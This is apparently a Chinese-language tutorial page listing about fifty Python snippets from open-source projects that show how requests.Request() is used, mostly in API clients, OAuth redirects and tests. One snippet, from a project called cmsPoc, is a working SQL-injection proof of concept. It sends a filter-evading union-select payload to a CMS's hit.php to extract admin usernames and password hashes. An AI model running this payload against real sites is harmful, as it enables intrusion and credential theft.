Python requests 模块,Request() 实例源码

我们从Python开源项目中,提取了以下50个代码示例,用于说明如何使用requests.Request()

项目:numerai    作者:gansanay    | 项目源码 | 文件源码
def upload_prediction(self, file_path):
        filename, signedRequest, headers, status_code = self.authorize(file_path)
        if status_code!=200:
            return status_code

        dataset_id, comp_id, status_code = self.get_current_competition()
        if status_code!=200:
            return status_code

        with open(file_path, 'rb') as fp:
            r = requests.Request('PUT', signedRequest, data=fp.read())
            prepped = r.prepare()
            s = requests.Session()
            resp = s.send(prepped)
            if resp.status_code!=200:
                return resp.status_code

        r = requests.post(self._submissions_url,
                    data={'competition_id':comp_id, 'dataset_id':dataset_id, 'filename':filename},
                    headers=headers)

        return r.status_code
项目:zmirror    作者:aploium    | 项目源码 | 文件源码
def extract_url_path_and_query(full_url=None, no_query=False):
    """
    Convert http://foo.bar.com/aaa/p.html?x=y to /aaa/p.html?x=y

    :param no_query:
    :type full_url: str
    :param full_url: full url
    :return: str
    """
    if full_url is None:
        full_url = request.url
    split = urlsplit(full_url)
    result = split.path or "/"
    if not no_query and split.query:
        result += '?' + split.query
    return result


# ################# End Client Request Handler #################


# ################# Begin Middle Functions #################
项目:AlexaOPi    作者:dony71    | 项目源码 | 文件源码
def index(self):
        scope="alexa_all"
        sd = json.dumps({
            "alexa:all": {
                "productID": ProductID,
                "productInstanceAttributes": {
                    "deviceSerialNumber": "001"
                }
            }
        })
        url = "https://www.amazon.com/ap/oa"
        callback = cherrypy.url()  + "code" 
        payload = {"client_id" : Client_ID, "scope" : "alexa:all", "scope_data" : sd, "response_type" : "code", "redirect_uri" : callback }
        req = requests.Request('GET', url, params=payload)
        p = req.prepare()
        raise cherrypy.HTTPRedirect(p.url)
项目:tap-freshdesk    作者:singer-io    | 项目源码 | 文件源码
def request(url, params=None):
    params = params or {}
    headers = {}
    if 'user_agent' in CONFIG:
        headers['User-Agent'] = CONFIG['user_agent']

    req = requests.Request('GET', url, params=params, auth=(CONFIG['api_key'], ""), headers=headers).prepare()
    logger.info("GET {}".format(req.url))
    resp = session.send(req)

    if 'Retry-After' in resp.headers:
        retry_after = int(resp.headers['Retry-After'])
        logger.info("Rate limit reached. Sleeping for {} seconds".format(retry_after))
        time.sleep(retry_after)
        return request(url, params)

    resp.raise_for_status()

    return resp
项目:AlexaPi    作者:alexa-pi    | 项目源码 | 文件源码
def index(self):
        sd = json.dumps({
            "alexa:all": {
                "productID": config['alexa']['Device_Type_ID'],
                "productInstanceAttributes": {
                    "deviceSerialNumber": hashlib.sha256(str(uuid.getnode()).encode()).hexdigest()
                }
            }
        })

        url = "https://www.amazon.com/ap/oa"
        callback = cherrypy.url() + "code"
        payload = {
            "client_id": config['alexa']['Client_ID'],
            "scope": "alexa:all",
            "scope_data": sd,
            "response_type": "code",
            "redirect_uri": callback
        }
        req = requests.Request('GET', url, params=payload)
        prepared_req = req.prepare()
        raise cherrypy.HTTPRedirect(prepared_req.url)
项目:intel-edison-alexa    作者:pedrominatel    | 项目源码 | 文件源码
def index(self):
        scope="alexa_all"
        sd = json.dumps({
            "alexa:all": {
                "productID": ProductID,
                "productInstanceAttributes": {
                    "deviceSerialNumber": "001"
                }
            }
        })
        url = "https://www.amazon.com/ap/oa"
        callback = cherrypy.url()  + "code" 
        payload = {"client_id" : Client_ID, "scope" : "alexa:all", "scope_data" : sd, "response_type" : "code", "redirect_uri" : callback }
        req = requests.Request('GET', url, params=payload)
        p = req.prepare()
        raise cherrypy.HTTPRedirect(p.url)
项目:learn_requests    作者:shfanzie    | 项目源码 | 文件源码
def hard_requests():
    from requests import Request, Session
    s = Session()
    headers = {'User-Agent': 'fake1.3.4'}
    req = Request('GET', build_uri('user/emails'), auth=('shfanzie', '**********'), headers = headers)
    prepped = req.prepare()
    print prepped.body
    print prepped.headers

    try:
        resp = s.send(prepped, timeout=1)
        resp.raise_for_status()
    except exceptions.Timeout as e:
        print e.message
    except exceptions.HTTPError as e:
        print e.message
    else:
        print resp.status_code
        print resp.reason
        print resp.request.headers
        print resp.text
项目:storj-python-sdk    作者:Storj    | 项目源码 | 文件源码
def _prepare_request(self, **kwargs):
        """Prepares a HTTP request.
        Args:
            kwargs (dict): keyword arguments for the authentication function
                (``_add_ecdsa_signature()`` or ``_add_basic_auth()``) and
                :py:class:`requests.Request` class.
        Raises:
            AssertionError: in case ``kwargs['path']`` doesn't start with ``/``.
        """

        kwargs.setdefault('headers', {})

        # Add appropriate authentication headers
        if isinstance(self.private_key, SigningKey):
            self._add_ecdsa_signature(kwargs)
        elif self.email and self.password:
            self._add_basic_auth(kwargs)

        # Generate URL from path
        path = kwargs.pop('path')
        assert path.startswith('/')
        kwargs['url'] = urljoin(self.api_url, path)

        return requests.Request(**kwargs).prepare()
项目:tap-adwords    作者:singer-io    | 项目源码 | 文件源码
def get_unfiltered_page(sdk_client, fields, start_index, stream):
    service_name = GENERIC_ENDPOINT_MAPPINGS[stream]['service_name']
    service_caller = sdk_client.GetService(service_name, version=VERSION)
    selector = {
        'fields': fields,
        'paging': {
            'startIndex': str(start_index),
            'numberResults': str(PAGE_SIZE)
        }
    }
    with metrics.http_request_timer(stream):
        LOGGER.info("Request %s %s from start_index %s for customer %s",
                    PAGE_SIZE,
                    stream,
                    start_index,
                    sdk_client.client_customer_id)
        page = attempt_get_from_service(service_caller, selector)
        return page
项目:tap-adwords    作者:singer-io    | 项目源码 | 文件源码
def get_field_list(stream_schema, stream, stream_metadata):
    #NB> add synthetic keys
    field_list = get_fields_to_sync(stream_schema, stream_metadata)
    LOGGER.info("Request fields: %s", field_list)
    field_list = filter_fields_by_stream_name(stream, field_list)
    LOGGER.info("Filtered fields: %s", field_list)
    # These are munged because of the nature of the API. When you pass
    # the field to the API you need to change its first letter to
    # upper case.
    #
    # See:
    # https://developers.google.com/adwords/api/docs/reference/v201708/AdGroupAdService.AdGroupAd
    # for instance
    field_list = [f[0].upper()+f[1:] for f in field_list]
    LOGGER.info("Munged fields: %s", field_list)
    return field_list
项目:TCP-IP    作者:JackZ0    | 项目源码 | 文件源码
def request_challenges(self, identifier, new_authzr_uri=None):
        """Request challenges.

        :param .messages.Identifier identifier: Identifier to be challenged.
        :param str new_authzr_uri: Deprecated. Do not use.

        :returns: Authorization Resource.
        :rtype: `.AuthorizationResource`

        """
        if new_authzr_uri is not None:
            logger.debug("request_challenges with new_authzr_uri deprecated.")
        new_authz = messages.NewAuthorization(identifier=identifier)
        response = self.net.post(self.directory.new_authz, new_authz)
        # TODO: handle errors
        assert response.status_code == http_client.CREATED
        return self._authzr_from_response(response, identifier)
项目:TCP-IP    作者:JackZ0    | 项目源码 | 文件源码
def request_domain_challenges(self, domain, new_authzr_uri=None):
        """Request challenges for domain names.

        This is simply a convenience function that wraps around
        `request_challenges`, but works with domain names instead of
        generic identifiers. See ``request_challenges`` for more
        documentation.

        :param str domain: Domain name to be challenged.
        :param str new_authzr_uri: Deprecated. Do not use.

        :returns: Authorization Resource.
        :rtype: `.AuthorizationResource`

        """
        return self.request_challenges(messages.Identifier(
            typ=messages.IDENTIFIER_FQDN, value=domain), new_authzr_uri)
项目:AlexaPiDEPRECATED    作者:alexa-pi    | 项目源码 | 文件源码
def index(self):
        scope="alexa_all"
        sd = json.dumps({
            "alexa:all": {
                "productID": ProductID,
                "productInstanceAttributes": {
                    "deviceSerialNumber": "001"
                }
            }
        })
        url = "https://www.amazon.com/ap/oa"
        callback = cherrypy.url()  + "code" 
        payload = {"client_id" : Client_ID, "scope" : "alexa:all", "scope_data" : sd, "response_type" : "code", "redirect_uri" : callback }
        req = requests.Request('GET', url, params=payload)
        p = req.prepare()
        raise cherrypy.HTTPRedirect(p.url)
项目:AlexaPi    作者:HighTeckMan    | 项目源码 | 文件源码
def index(self):
        scope="alexa_all"
        sd = json.dumps({
            "alexa:all": {
                "productID": ProductID,
                "productInstanceAttributes": {
                    "deviceSerialNumber": "001"
                }
            }
        })
        url = "https://www.amazon.com/ap/oa"
        callback = cherrypy.url()  + "code" 
        payload = {"client_id" : Client_ID, "scope" : "alexa:all", "scope_data" : sd, "response_type" : "code", "redirect_uri" : callback }
        req = requests.Request('GET', url, params=payload)
        p = req.prepare()
        raise cherrypy.HTTPRedirect(p.url)
项目:cmsPoc    作者:CHYbeta    | 项目源码 | 文件源码
def poc():
    try:
        if  not target.url.endswith("hit.php"):
            print("[*] Please make sure the url end with 'hit.php'")
            exit()
        s = Session()
        headers = {"Content-Type": "application/x-www-form-urlencoded"}
        payload = "?g=arthit&id=0+uni%6fn+s%65l%65ct+1,1,1,1,1,1,group_concat(id,0x3c62723e,adnaa,0x3c62723e,adpss,0x3c62723e),1,1,1,1,1+fro%6d+axublog_adusers"
        url = target.url + payload
        req = Request('GET', url)
        prepped = s.prepare_request(req)
        prepped.url = prepped.url.replace('o', '%6f')
        prepped.url = prepped.url.replace('e', '%65')
        resp = s.send(prepped)
        p = re.compile("(?<=document.write\(1<br>)(.*)(?=<br>\);)")
        result = re.search(p,resp.text).group(0).split('<br>')
        print("[*] Get the username : "+ result[0])
        print("[*] Get the password(encrypted) : "+ result[1])
        # r = requests.get(url,proxies=proxy)
        # print(r.text)
        print("\033[33m[*] Complete this task: {} \033[0m".format(target.url))
    except (KeyError,AttributeError) as e:
        print("\033[31m[!] This poc doesn't seem to work.Please try another one.\033[0m")
项目:Python-Network-Programming-Cookbook-Second-Edition    作者:PacktPublishing    | 项目源码 | 文件源码
def main(address):

    # Throttle the requests with the BaseThrottler, delaying 1.5s.
    bt = BaseThrottler(name='base-throttler', delay=1.5)

    # Visit the address provided by the user. Complete URL only.
    r = requests.Request(method='GET', url=address)

    # 10 requests.
    reqs = [r for i in range(0, 10)]

    # Submit the requests with the required throttling.
    with bt:
        throttled_requests = bt.submit(reqs)

    # Print the response for each of the requests.
    for r in throttled_requests:
        print (r.response)

    # Final status of the requests.
    print ("Success: {s}, Failures: {f}".format(s=bt.successes, f=bt.failures))
项目:kuberdock-platform    作者:cloudlinux    | 项目源码 | 文件源码
def _run(self, act, res, args):
        try:
            with warnings.catch_warnings():
                warnings.simplefilter("ignore")
                url = self._make_url(res)
                request_object = requests.Request(method=act, url=url, **args)
                request_object = self.conn.prepare_request(request_object)
                self.request_logger.log_curl_request(request_object)
                req = self.conn.send(request_object)
                self.request_logger.log_http_response(req)
                return self._return_request(req)
        except requests.exceptions.ConnectionError as e:
            return self._raise_error(str(e))
        except requests.exceptions.HTTPError as e:
            try:
                res = req.json()
                res = res['data']
            except:
                res = str(e)
            return self._raise_error(res)
项目:kuberdock-platform    作者:cloudlinux    | 项目源码 | 文件源码
def log_curl_request(self, request):
        self.logger.debug('#################### Request ####################')
        curl = ['curl -i -L -X %s' % request.method]

        for (key, value) in request.headers.items():
            header = '-H \'%s: %s\'' % self._process_header(key, value)
            curl.append(header)

        if not self.session.verify:
            curl.append('-k')
        elif isinstance(self.session.verify, basestring):
            curl.append('--cacert %s' % self.session.verify)

        if self.session.cert:
            curl.append('--cert %s' % self.session.cert[0])
            curl.append('--key %s' % self.session.cert[1])

        if request.body:
            curl.append('-d \'%s\'' % request.body)

        curl.append('"%s"' % request.url)
        self.logger.debug(' '.join(curl))
项目:pico    作者:andresriancho    | 项目源码 | 文件源码
def send_with_naive_timing(session, url, token):
    # Prepare the request this way to avoid the auto-added User-Agent and Accept
    # headers.
    #
    # TODO: What happens if I want to send data? Do I need to add the
    #       Content-Type header manually?
    req = requests.Request('GET',
                           url,
                           headers={'Authorization': 'Token %s' % token,
                                    'Accept-Encoding': 'identity'}
                           )
    prepared_request = req.prepare()

    response = session.send(prepared_request,
                            allow_redirects=False,
                            verify=False)
    naive_time = response.elapsed.microseconds

    return response, naive_time
项目:backpack.py    作者:Zwork101    | 项目源码 | 文件源码
def add_listing_alert(self, intent, type, item_raw_name, blanket=1, craftable=True):
        url = Notifications.ITEM_ALERT+ type +'/'+ parse.quote(item_raw_name) + '/Tradable/'
        data = {
            "user-id": self.cookies['user-id'],
            "item_name":type + ' ' + item_raw_name,
            "intent":intent,
            "blanket":blanket
        }
        if craftable:
            url += 'Craftable'
        else:
            url += 'Non-Craftable'
        headers = Notifications.gen_headers('/classifieds/subscriptions', url, 'PUT')
        r = requests.Request('PUT', Notifications.ITEM_ALERT, data=data, headers=headers, cookies=self.cookies)
        prepped = r.prepare()
        return self._session.send(prepped)
项目:ruffruffs    作者:di    | 项目源码 | 文件源码
def test_prepared_from_session(self, httpbin):
        class DummyAuth(requests.auth.AuthBase):
            def __call__(self, r):
                r.headers['Dummy-Auth-Test'] = 'dummy-auth-test-ok'
                return r

        req = requests.Request('GET', httpbin('headers'))
        assert not req.auth

        s = requests.Session()
        s.auth = DummyAuth()

        prep = s.prepare_request(req)
        resp = s.send(prep)

        assert resp.json()['headers'][
            'Dummy-Auth-Test'] == 'dummy-auth-test-ok'
项目:ruffruffs    作者:di    | 项目源码 | 文件源码
def test_requests_are_updated_each_time(httpbin):
    session = RedirectSession([303, 307])
    prep = requests.Request('POST', httpbin('post')).prepare()
    r0 = session.send(prep)
    assert r0.request.method == 'POST'
    assert session.calls[-1] == SendCall((r0.request,), {})
    redirect_generator = session.resolve_redirects(r0, prep)
    default_keyword_args = {
        'stream': False,
        'verify': True,
        'cert': None,
        'timeout': None,
        'allow_redirects': False,
        'proxies': {},
    }
    for response in redirect_generator:
        assert response.request.method == 'GET'
        send_call = SendCall((response.request,), default_keyword_args)
        assert session.calls[-1] == send_call
项目:AlexaBeagleBone2    作者:merdahl    | 项目源码 | 文件源码
def index(self):
        scope="alexa_all"
        sd = json.dumps({
            "alexa:all": {
                "productID": ProductID,
                "productInstanceAttributes": {
                    "deviceSerialNumber": "001"
                }
            }
        })
        url = "https://www.amazon.com/ap/oa"

        # Establish AMZN callback URL
        callback = cherrypy.url()  + "code"

        payload = { "client_id" : Client_ID,
                    "scope" : "alexa:all",
                    "scope_data" : sd,
                    "response_type" : "code", 
                    "redirect_uri" : callback }

        req = requests.Request('GET', url, params=payload)
        p = req.prepare()
        raise cherrypy.HTTPRedirect(p.url)
项目:openqa_review    作者:okurz    | 项目源码 | 文件源码
def _get(self, url, as_json=False):  # pragma: no cover
        for i in range(1, 7):
            try:
                r = requests.get(url, auth=self.auth)
            except requests.exceptions.ConnectionError:
                log.info("Connection error encountered accessing %s, retrying try %s" % (url, i))
                continue
            if r.status_code == 502:
                log.info("Request to %s failed with status code 502, retrying try %s" % (url, i))
                continue
            if r.status_code != 200:
                msg = "Request to %s was not successful, status code: %s" % (url, r.status_code)
                log.info(msg)
                raise DownloadError(msg)
            break
        else:
            msg = "Request to %s was not successful after multiple retries, giving up. Status code: %s" % (url, r.status_code)
            log.warn(msg)
            raise DownloadError(msg)
        content = r.json() if as_json else r.content.decode('utf8')
        return content
项目:AlexaPi    作者:kgpayne    | 项目源码 | 文件源码
def index(self):
        scope="alexa_all"
        sd = json.dumps({
            "alexa:all": {
                "productID": ProductID,
                "productInstanceAttributes": {
                    "deviceSerialNumber": "001"
                }
            }
        })
        url = "https://www.amazon.com/ap/oa"
        callback = cherrypy.url()  + "code" 
        payload = {"client_id" : Client_ID, "scope" : "alexa:all", "scope_data" : sd, "response_type" : "code", "redirect_uri" : callback }
        req = requests.Request('GET', url, params=payload)
        p = req.prepare()
        raise cherrypy.HTTPRedirect(p.url)
项目:NintendoClients    作者:Kinnay    | 项目源码 | 文件源码
def login(self, username, password, hash=False):
        data = {
            "grant_type": "password",
            "user_id": username,
            "password": password
        }
        if hash:
            data["password_type"] = "hash"

        request = Request(self)
        response = request.get(
            "oauth20/access_token/generate",
            data = data
        )

        self.access_token = response.oauth20.access_token.token.text
        self.refresh_token = response.oauth20.access_token.refresh_token.text
        self.refresh_time = time.time() + int(response.oauth20.access_token.expires_in.text)
项目:certbot    作者:nikoloskii    | 项目源码 | 文件源码
def request_challenges(self, identifier, new_authzr_uri=None):
        """Request challenges.

        :param .messages.Identifier identifier: Identifier to be challenged.
        :param str new_authzr_uri: ``new-authorization`` URI. If omitted,
            will default to value found in ``directory``.

        :returns: Authorization Resource.
        :rtype: `.AuthorizationResource`

        """
        new_authz = messages.NewAuthorization(identifier=identifier)
        response = self.net.post(self.directory.new_authz
                                 if new_authzr_uri is None else new_authzr_uri,
                                 new_authz)
        # TODO: handle errors
        assert response.status_code == http_client.CREATED
        return self._authzr_from_response(response, identifier)
项目:certbot    作者:nikoloskii    | 项目源码 | 文件源码
def request_domain_challenges(self, domain, new_authzr_uri=None):
        """Request challenges for domain names.

        This is simply a convenience function that wraps around
        `request_challenges`, but works with domain names instead of
        generic identifiers. See ``request_challenges`` for more
        documentation.

        :param str domain: Domain name to be challenged.

        :returns: Authorization Resource.
        :rtype: `.AuthorizationResource`

        """
        return self.request_challenges(messages.Identifier(
            typ=messages.IDENTIFIER_FQDN, value=domain), new_authzr_uri)
项目:lti    作者:pylti    | 项目源码 | 文件源码
def generate_launch_request(self, **kwargs):
        """
        returns a Oauth v1 "signed" requests.PreparedRequest instance
        """

        if not self.has_required_params():
            raise InvalidLTIConfigError(
                'Consumer\'s launch params missing one of '
                + str(LAUNCH_PARAMS_REQUIRED)
            )

        params = self.to_params()
        r = Request('POST', self.launch_url, data=params).prepare()
        sign = OAuth1(self.consumer_key, self.consumer_secret,
                                signature_type=SIGNATURE_TYPE_BODY, **kwargs)
        return sign(r)
项目:talk-network-retries    作者:marchukov    | 项目源码 | 文件源码
def get_retry_extended():
    retry = urllib3.util.Retry(total=MAX_RETRIES, connect=MAX_RETRIES, read=MAX_RETRIES, backoff_factor=BACKOFF_FACTOR)

    def attempt(url, retry=retry):
        try:
            # this essentially creates a new connection pool per request :-(
            session = requests.Session()
            adapter = requests.adapters.HTTPAdapter(max_retries=retry)
            session.mount(RETRY_PREFIX, adapter)
            req = requests.Request('GET', url).prepare()
            # would be nice just to pass retry here, but we cannot :-(
            r = session.send(req, timeout=TIMEOUT)
            r.raise_for_status()
#        except MaxRetryError:
#            raise
        except ConnectionError as e:
            #  increment() will return a new Retry() object
            retry = retry.increment(req.method, url, error=e)
            retry.sleep()
            logging.warning("Retrying (%r) after connection broken by '%r': '%s'", retry, e, url)
            return attempt(url, retry=retry)
        return r

    return attempt(URL).json()
项目:talk-network-retries    作者:marchukov    | 项目源码 | 文件源码
def get_content_aware():
    retry = urllib3.util.Retry(total=MAX_RETRIES,
                               connect=MAX_RETRIES,
                               read=MAX_RETRIES,
                               backoff_factor=BACKOFF_FACTOR)

    def attempt(url, retry=retry):
        try:
            session = requests.Session()
            adapter = requests.adapters.HTTPAdapter(max_retries=retry)
            session.mount(RETRY_PREFIX, adapter)
            req = requests.Request('GET', url).prepare()
            r = session.send(req, timeout=TIMEOUT)
            r.raise_for_status()
            j = r.json()
        # DEMO ONLY. TypeError is too wide to handle here
        except (ConnectionError, TypeError) as e:
            retry = retry.increment(req.method, url, error=e)
            retry.sleep()
            logging.warning("Retrying (%r) after connection broken by '%r': '%s'", retry, e, url)
            return attempt(url, retry=retry)
        return j

    return attempt(URL)
项目:qingstor-sdk-python    作者:yunify    | 项目源码 | 文件源码
def parse(self):
        parsed_operation = dict()
        parsed_operation["Method"] = self.operation["Method"]
        parsed_operation["URI"] = self.parse_request_uri()
        self.logger.debug("parsed_uri: %s" % parsed_operation["URI"])
        parsed_body, _ = self.parse_request_body()
        if parsed_body:
            parsed_operation["Body"] = parsed_body
        parsed_headers = self.parse_request_headers()
        if parsed_headers:
            parsed_operation["Headers"] = parsed_headers
        req = Req(
            parsed_operation["Method"],
            parsed_operation["URI"],
            data=parsed_body,
            headers=parsed_headers
        )
        return req
项目:matrix-creator-alexa-voice-demo    作者:matrix-io    | 项目源码 | 文件源码
def index(self):
        scope = "alexa_all"
        sd = json.dumps({
            "alexa:all": {
                "productID": ProductID,
                "productInstanceAttributes": {
                    "deviceSerialNumber": "001"
                }
            }
        })
        url = "https://www.amazon.com/ap/oa"
        callback = cherrypy.url() + "code"
        payload = {"client_id": Client_ID, "scope": "alexa:all",
                   "scope_data": sd, "response_type": "code", "redirect_uri": callback}
        req = requests.Request('GET', url, params=payload)
        p = req.prepare()
        raise cherrypy.HTTPRedirect(p.url)
项目:lets-do-dns    作者:Jitsusama    | 项目源码 | 文件源码
def test_properly_raises_correct_record_failure_on_related_method_error(
        mocker, method, exception):
    stub_error = HTTPError()
    stub_raise_for_status = mocker.MagicMock(side_effect=stub_error)
    stub_request = mocker.MagicMock(spec=requests.Request, method=method)
    stub_response = mocker.MagicMock(
        spec=requests.Response,
        raise_for_status=stub_raise_for_status, request=stub_request)

    class_to_mock = 'lets_do_dns.do_domain.response.{}'.format(
        exception.__name__)
    mock_record_failure = mocker.patch(
        class_to_mock, return_value=exception)

    with pytest.raises(exception):
        Response(stub_response)

    mock_record_failure.assert_called_once_with(stub_error)
项目:cbapi-python    作者:carbonblack    | 项目源码 | 文件源码
def _url_to_key(self, url):
        session = requests.Session()
        return self.create_key(session.prepare_request(requests.Request('GET', url)))
项目:umapi-client.py    作者:adobe-apiplatform    | 项目源码 | 文件源码
def test_ua_string():
    conn = Connection(**mock_connection_params)
    req = conn.session.prepare_request(requests.Request('GET', "http://test.com/"))
    ua_header = req.headers.get("User-Agent")
    assert ua_header.startswith("umapi-client/" + umapi_version)
    assert " Python" in ua_header
    req = conn.session.prepare_request(requests.Request('POST', "http://test.com/", data="This is a test"))
    ua_header = req.headers.get("User-Agent")
    assert ua_header.startswith("umapi-client/" + umapi_version)
    assert " Python" in ua_header
项目:umapi-client.py    作者:adobe-apiplatform    | 项目源码 | 文件源码
def test_ua_string_additional():
    conn = Connection(user_agent="additional/1.0", **mock_connection_params)
    req = conn.session.prepare_request(requests.Request('GET', "http://test.com/"))
    ua_header = req.headers.get("User-Agent")
    assert ua_header.startswith("additional/1.0 umapi-client/" + umapi_version)
    req = conn.session.prepare_request(requests.Request('POST', "http://test.com/", data="This is a test"))
    ua_header = req.headers.get("User-Agent")
    assert ua_header.startswith("additional/1.0 umapi-client/" + umapi_version)
项目:cos-python-sdk-v5    作者:tencentyun    | 项目源码 | 文件源码
def get_auth(self, Method, Bucket, Key='', Expired=300, Headers={}, Params={}):
        """????

        :param Method(string): http method,?'PUT','GET'.
        :param Bucket(string): ?????.
        :param Key(string): ??COS???.
        :param Expired(int): ??????,???s.
        :param headers(dict): ????http headers.
        :param params(dict): ????http params.
        :return (string): ????V5??.
        """
        url = self._conf.uri(bucket=Bucket, path=quote(Key, '/-_.~'))
        r = Request(Method, url, headers=Headers, params=Params)
        auth = CosS3Auth(self._conf._secret_id, self._conf._secret_key, Key, Params, Expired)
        return auth(r).headers['Authorization']
项目:zmirror    作者:aploium    | 项目源码 | 文件源码
def response_cookie_rewrite(cookie_string):
    """
    rewrite response cookie string's domain to `my_host_name`
    :type cookie_string: str
    """
    cookie_string = regex_cookie_rewriter.sub('domain=' + my_host_name_no_port, cookie_string)
    return cookie_string


# ################# End Server Response Handler #################


# ################# Begin Client Request Handler #################
项目:bearychat.py    作者:bearyinnovative    | 项目源码 | 文件源码
def do(self,
           resource,
           method,
           params=None,
           data=None,
           json=None,
           headers=None):
        """Does the request job

        Args:
            resource(str): resource uri(relative path)
            method(str): HTTP method
            params(dict): uri queries
            data(dict): HTTP body(form)
            json(dict): HTTP body(json)
            headers(dict): HTTP headers

        Returns:
            RTMResponse
        """
        uri = "{0}/{1}".format(self._api_base, resource)
        if not params:
            params = {}
        params.update({'token': self._token})

        req = Request(
            method=method,
            url=uri,
            params=params,
            headers=headers,
            data=data,
            json=json)
        s = Session()
        prepped = s.prepare_request(req)
        resp = s.send(prepped)

        return RTMResponse(resp)
项目:mturk-crowd-beta-client-python    作者:awslabs    | 项目源码 | 文件源码
def _make_request(self, method, function_name, task_name, body=None):
        uri_path = self._build_uri_path(function_name, task_name)
        headers = self._build_aws_sigv4_headers(method, uri_path, body)
        url = _ENDPOINT + uri_path

        request = Request(
            method,
            url,
            headers=headers,
            json=body).prepare()
        logger.debug('Invoking {} on URL {} with headers={}, body={}'.format(
            request.method,
            request.url,
            json.dumps(dict(request.headers)),
            request.body))
        response = Session().send(request, timeout=_TIMEOUT_SECONDS)
        return response
项目:wallstreet    作者:mcdallas    | 项目源码 | 文件源码
def prepare_request(*args, **kwargs):
    r = requests.Request(*args, **kwargs)
    s = requests.Session()
    return s.prepare_request(r)
项目:fbarc    作者:justinlittman    | 项目源码 | 文件源码
def generate_url(self, node_id, definition_name, escape=False):
        """
        Returns the url for retrieving the specified node from the Graph API
        given the node type definition.
        """
        url, params = self._prepare_node_request(node_id, definition_name)
        if not escape:
            return '{}?{}'.format(url, '&'.join(['{}={}'.format(k, v) for k, v in params.items()]))
        else:
            return requests.Request('GET', url, params=params).prepare().url
项目:pyfc4    作者:ghukill    | 项目源码 | 文件源码
def start_txn(self, txn_name=None):

        '''
        Request new transaction from repository, init new Transaction, 
        store in self.txns

        Args:
            txn_name (str): human name for transaction

        Return:
            (Transaction): returns intance of newly created transaction
        '''

        # if no name provided, create one
        if not txn_name:
            txn_name = uuid.uuid4().hex

        # request new transaction
        txn_response = self.api.http_request('POST','%s/fcr:tx' % self.root, data=None, headers=None)

        # if 201, transaction was created
        if txn_response.status_code == 201:

            txn_uri = txn_response.headers['Location']
            logger.debug("spawning transaction: %s" % txn_uri)

            # init new Transaction, and pass Expires header
            txn = Transaction(
                self, # pass the repository
                txn_name,
                txn_uri,
                expires = txn_response.headers['Expires'])

            # append to self
            self.txns[txn_name] = txn

            # return 
            return txn
项目:talisker    作者:canonical-ols    | 项目源码 | 文件源码
def response(
        method='GET',
        host='http://example.com',
        url='/',
        code=200,
        elapsed=1.0):
    req = requests.Request(method, host + url)
    resp = requests.Response()
    resp.request = req.prepare()
    resp.status_code = code
    resp.elapsed = timedelta(seconds=elapsed)
    return resp
项目:talisker    作者:canonical-ols    | 项目源码 | 文件源码
def test_configure():
    session = requests.Session()
    talisker.requests.configure(session)

    req = requests.Request('GET', 'http://localhost')
    with talisker.request_id.context('XXX'):
        prepared = session.prepare_request(req)

    assert prepared.headers['X-Request-Id'] == 'XXX'
项目:trio2o    作者:openstack    | 项目源码 | 文件源码
def forward_req(context, action, b_headers, b_url, b_body):
    s = Session()
    req = Request(action, b_url,
                  data=b_body,
                  headers=b_headers)
    prepped = req.prepare()

    # do something with prepped.body
    # do something with prepped.headers
    resp = s.send(prepped,
                  timeout=60)

    return resp
项目:threatstack-python-client    作者:MyPureCloud    | 项目源码 | 文件源码
def http_request(self, method, path, data=None, params=None):
        """ Wraps HTTP calls to ThrestStack API """

        s = Session()
        url = urljoin(self.BASE_URL, path)
        headers = {"Authorization": self.api_key}
        if self.org_id:
            headers[self.org_id_header] = self.org_id

        req = Request(
            method,
            url,
            headers=headers,
            data=data,
            params=params
        )
        prepped = req.prepare()
        resp = s.send(prepped, timeout=self.timeout)
        if resp.status_code == 429:
            raise errors.APIRateLimitError("Threat Stack API rate limit exceeded")
        else:
            return self.handle_response(resp)
项目:mygene.info    作者:biothings    | 项目源码 | 文件源码
def _query(self, *args, **kwargs):
        req = requests.Request(*args, **kwargs)
        res = self.client.send(req.prepare())
        if res.status_code != 200:
            raise MartException(res)
        if res.text.startswith('Query ERROR:'):
            raise MartException(res.text)
        return res.text
项目:pycarwings2    作者:jdhorne    | 项目源码 | 文件源码
def _request(self, endpoint, params):
        params["initial_app_strings"] = "geORNtsZe5I4lRGjG9GZiA"
        if self.custom_sessionid:
            params["custom_sessionid"] = self.custom_sessionid
        else:
            params["custom_sessionid"] = ""

        req = Request('POST', url=BASE_URL + endpoint, data=params).prepare()

        log.debug("invoking carwings API: %s" % req.url)
        log.debug("params: %s" % json.dumps(params, sort_keys=True, indent=3, separators=(',', ': ')))

        try:
            sess = requests.Session()
            response = sess.send(req)
            log.debug('Response HTTP Status Code: {status_code}'.format(
                status_code=response.status_code))
            log.debug('Response HTTP Response Body: {content}'.format(
                content=response.content))
        except RequestException:
            log.warning('HTTP Request failed')

        j = json.loads(response.content)

        if "message" in j and j["message"] == "INVALID PARAMS":
            log.error("carwings error %s: %s" % (j["message"], j["status"]) )
            raise CarwingsError("INVALID PARAMS")
        if "ErrorMessage" in j:
            log.error("carwings error %s: %s" % (j["ErrorCode"], j["ErrorMessage"]) )
            raise CarwingsError

        return j